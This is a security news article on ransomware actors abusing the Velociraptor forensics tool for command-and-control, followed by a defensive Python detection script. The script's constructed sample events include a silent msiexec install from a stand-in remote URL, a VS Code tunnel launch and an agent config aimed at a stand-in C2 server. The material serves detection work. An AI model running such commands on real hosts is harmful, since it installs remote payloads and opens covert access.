Security researchers report that attackers have begun using Velociraptor, a legitimate digital forensics and incident response tool, as a covert command-and-control mechanism in ransomware campaigns. In recent incidents, adversaries installed Velociraptor on compromised hosts, configured it to communicate with attacker-controlled servers, and used it to download and execute tools such as Visual Studio Code with tunneling to maintain remote access before deploying payloads.
Attackers Install Velociraptor via MSI and Use Tunneling Through VS Code for C2
In observed campaigns, threat actors gained initial access through standard entry vectors—phishing emails, exposed RDP, or vulnerable services—and then launched an MSI installer via Windows msiexec to deploy Velociraptor. The installer was hosted on Cloudflare Workers domains and configured Velociraptor to contact a command-and-control (C2) domain managed by the adversary.
Velociraptor was then used to download and launch Visual Studio Code in tunnel mode, enabling remote access channels for the attackers. In several cases, the actors subsequently installed additional malware through further MSI downloads, staging ransomware or backdoors.
Because Velociraptor is a legitimate tool, its process signatures and network patterns may appear benign, making it easier for attackers to blend with normal system activity. Analysts caution that unexpected or unauthorized Velociraptor installations should be treated as high-risk indicators of malicious behavior.
Misuse of Forensics Tools Signals Sophisticated Ransomware Tradecraft
Researchers have observed attackers using Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability (CVE-2025-6264) that may have been leveraged in some attacks. Once the agent is installed, this misuse of legitimate tooling bypasses many signature-based detections, enabling lateral movement and data staging without deploying obvious malware.
In multiple cases linked to this technique, attackers have targeted virtualized environments, including VMware ESXi hosts, to expand access and impact. The combination of legitimate tooling, tunneling via code editors, and staged payloads demonstrates an evolved, stealth-focused ransomware approach.
Security specialists emphasize that defenders must reconsider trust boundaries for forensic and administrative utilities and monitor deviations in their usage—especially those performing downloads, tunneling, or cross-network execution.
Defensive Measures and Detection Strategies Against Velociraptor Abuse
Incident response providers and vendors have issued guidance for detecting and mitigating Velociraptor misuse. Recommended strategies include:
- Monitoring for MSI installations, in particular msiexec invocations that fetch packages from remote domains
- Identifying Velociraptor agents configured to communicate with nonstandard or unusual endpoints
- Flagging processes invoking VS Code or tunneling subcomponents launched from Velociraptor agents
- Restricting installation rights to MSI packages and limiting trusted host lists for DFIR tools
- Validating agent configurations against approved server allow-lists and scanning for deviations
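The three detection ideas that can be checked from endpoint telemetry (msiexec pulling a remote package, a VS Code tunnel spawned under a Velociraptor process, and a client configuration pointing at an unapproved server) as an added example. This is illustration code written for this page, not guidance or code from the original report or from the Velociraptor project. The event fields, the process names, the `APPROVED_SERVERS` allow-list and all domains and paths are constructed assumptions; only the `Client: server_urls:` layout mirrors the real client configuration format.

```python
"""Detection rules for Velociraptor abuse, run over constructed process-creation
events and a constructed Velociraptor client configuration.

Added example, not code from the article or the Velociraptor project. Field
names, hostnames, paths and the allow-list below are assumptions.
"""
import re
from dataclasses import dataclass

# Hypothetical allow-list of the only servers a sanctioned agent may contact.
APPROVED_SERVERS = {"https://velociraptor.corp.example:8000/"}

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    image: str    # basename of the created process image (e.g. Sysmon 1 / 4688)
    parent: str   # basename of the parent process image
    cmdline: str  # full command line of the created process


def check_remote_msi(ev: ProcEvent):
    """Rule 1: msiexec installing a package fetched from a remote URL."""
    if ev.image.lower() != "msiexec.exe":
        return None
    m = REMOTE_URL.search(ev.cmdline)
    if not m:
        return None
    return f"msiexec installing remote package {m.group(0)}"


def check_vscode_tunnel(ev: ProcEvent):
    """Rule 2: VS Code started in tunnel mode with a Velociraptor parent."""
    if ev.parent.lower() != "velociraptor.exe" or ev.image.lower() != "code.exe":
        return None
    if "tunnel" not in ev.cmdline.lower().split():
        return None
    return f"VS Code tunnel launched by Velociraptor: {ev.cmdline}"


def scan_events(events):
    """Apply both process rules and return the list of findings."""
    findings = []
    for ev in events:
        for rule in (check_remote_msi, check_vscode_tunnel):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


def server_urls(config_text: str):
    """Extract the Client.server_urls list from a client config (minimal
    line-based parse so the example needs no YAML dependency)."""
    urls, in_list = [], False
    for line in config_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("server_urls:"):
            in_list = True
            continue
        if in_list:
            if stripped.startswith("- "):
                urls.append(stripped[2:].strip().strip("'\""))
            elif stripped:           # first non-list entry ends the block
                in_list = False
    return urls


def check_config(config_text: str, approved=APPROVED_SERVERS):
    """Rule 3: server URLs in the agent config that are not on the allow-list."""
    return [u for u in server_urls(config_text) if u not in approved]


# Constructed sample telemetry: two msiexec runs (one remote, one local) and
# two code.exe launches (one tunnel under Velociraptor, one normal editor start).
SAMPLE_EVENTS = [
    ProcEvent("msiexec.exe", "explorer.exe",
              "msiexec.exe /i https://example-worker.workers.dev/v.msi /qn"),
    ProcEvent("msiexec.exe", "explorer.exe",
              "msiexec.exe /i C:\\Windows\\Temp\\update.msi /qn"),
    ProcEvent("code.exe", "velociraptor.exe",
              "\"C:\\Users\\Public\\code\\code.exe\" tunnel --accept-server-license-terms"),
    ProcEvent("code.exe", "explorer.exe",
              "\"C:\\Program Files\\Microsoft VS Code\\code.exe\" C:\\src"),
]

# Constructed client config whose server is not on the allow-list.
SAMPLE_CONFIG = """\
version:
  name: velociraptor
Client:
  server_urls:
    - https://c2.example.net:8000/
  ca_certificate: |
    -----BEGIN CERTIFICATE-----
    (omitted)
    -----END CERTIFICATE-----
  nonce: constructed
"""

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print("ALERT:", f)
    for u in check_config(SAMPLE_CONFIG):
        print("ALERT: agent configured for unapproved server", u)
```

Running the script emits two process alerts (the remote msiexec install and the tunnel launch) and one configuration alert; the local MSI install and the ordinary editor launch produce nothing, which is the noise floor these rules are meant to sit above. In practice the events would come from Sysmon or Security 4688 exports and the config from the agent's installed `client.config.yaml`, and the allow-list should be the servers your own deployment actually uses.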
Velociraptor’s own documentation also advises defenders to detect abuse by watching for the creation of a new Windows EventLog source under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\Velociraptor, a registry key that the installer registers automatically, so its appearance on a host with no sanctioned deployment indicates an unexpected installation.
The misuse trend underscores that defenders should treat any unexplained deployment of DFIR or forensics utilities as a potential red flag. Organizations should also simulate adversarial use of trusted tools during red-teaming to better surface anomalous behaviors before they occur in real attacks.
Investigations into the incidents remain active. Security teams and CERTs are sharing indicators of compromise and telemetry patterns with platform providers to strengthen detection and block reuse of compromised infrastructure. As attackers refine their techniques, defenders must treat even trusted, legitimate tools as potentially weaponized assets.